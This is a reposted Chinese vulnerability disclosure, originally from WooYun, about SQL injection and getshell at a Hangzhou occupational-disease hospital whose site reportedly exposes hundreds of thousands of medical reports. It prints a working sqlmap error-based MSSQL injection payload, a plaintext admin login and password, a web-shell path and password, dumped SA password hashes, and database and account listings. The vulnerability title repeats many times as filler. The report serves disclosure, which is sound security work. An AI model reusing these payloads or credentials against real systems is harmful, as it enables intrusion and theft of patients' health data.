神刀安全网

漏洞标题: 杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞详情

披露状态:

2016-04-26: 细节已通知厂商并且等待厂商处理中
2016-04-28: 厂商已经确认,细节仅向厂商公开
2016-05-08: 细节向核心白帽子及相关领域专家公开
2016-05-18: 细节向普通白帽子公开
2016-05-28: 细节向实习白帽子公开
2016-06-12: 细节向公众公开

简要描述:

如题、、、

详细说明:

杭州市职业病防治院某处漏洞(getshell)泄露几十万份详细体检报告..

杭州市职业病防治院某处SQL注入漏洞,发现是SA 权限 跑出大量敏感数据,登录网站后台 直接任意文件上传getshell 、、、、

泄露几十万份详细的体检报告以及该防治院医生信息。。。。

注入点:http://**.**.**.**/search/?key=

后台:http://**.**.**.**/admin admin qwertyuiop4824

shell:http://**.**.**.**/data/files/20160425151351.aspx F4ck

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: key
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: key=%' AND 7049=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(118) CHAR(114)
CHAR(58) (SELECT (CASE WHEN (7049=7049) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(
58) CHAR(105) CHAR(108) CHAR(108) CHAR(58))) AND '%'='
---
[10:31:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

available databases [8]:
[*] fzy
[*] hzpcc
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


current database: 'fzy'


current user: 'sa'

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f
header: 0x0100
salt: 3869d680
mixedcase: adf63db291c6737f1efb8e4a481b02284215913f

[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
header: 0x0100
salt: 8d22a249
mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f

[*] sa [1]:
password hash: 0x010056049b0ef1e0c5755578b528f857fd1b3a895054a5611f69
header: 0x0100
salt: 56049b0e
mixedcase: f1e0c5755578b528f857fd1b3a895054a5611f69


Database: fzy
[24 tables]
+--------------------+
| TN_ACCOUNT |
| TN_ARTICLE |
| TN_ARTICLE_CATALOG |
| TN_BOX_RECV |
| TN_BOX_SEND |
| TN_CGJ_BG |
| TN_CGJ_DJ |
| TN_COLUMN |
| TN_DEPT |
| TN_ENUM |
| TN_GROUP |
| TN_LINK |
| TN_LINK_CATALOG |
| TN_LY |
| TN_MODULE_USER |
| TN_MSG |
| TN_PARAM |
| TN_RECRUITMENT |
| TN_TG |
| TN_USER |
| TN_WZ |
| TN_XF |
| TN_ZB |
| TN_ZB_TYPE |
+--------------------+

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞证明:

code 区域
Database: fzy
Table: TN_USER
[18 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| dept_id | varchar |
| idcard | varchar |
| isdelete | int |
| isleader | int |
| sex | int |
| user_birthday | datetime |
| user_email | varchar |
| user_id | varchar |
| user_job | varchar |
| user_login | varchar |
| user_mobile | varchar |
| user_name | varchar |
| user_no | varchar |
| user_office | varchar |
| user_phone | varchar |
| user_pic | varchar |
| user_pwd | varchar |
| user_virtualno | varchar |
+----------------+----------+



Database: fzy
Table: TN_ACCOUNT
[4 entries]
+-----------------------------------------+------------+
| user_pwd | user_login |
+-----------------------------------------+------------+
| 540bd55a2cf295b8ea9cd78650e89d03 (0019) | 0019 |
| 5e90ae5f6eb12b3f3e3c86c0409de103 (0207) | 0207 |
| a47fa956d8c823d9e8a47d0cbffc20b5 | admin |qwertyuiop4824
| fc1198178c3594bfdda3ca2996eb65cb | 0010 |
+-----------------------------------------+------------+

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞标题:  杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

修复方案:

过滤吧。。。

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址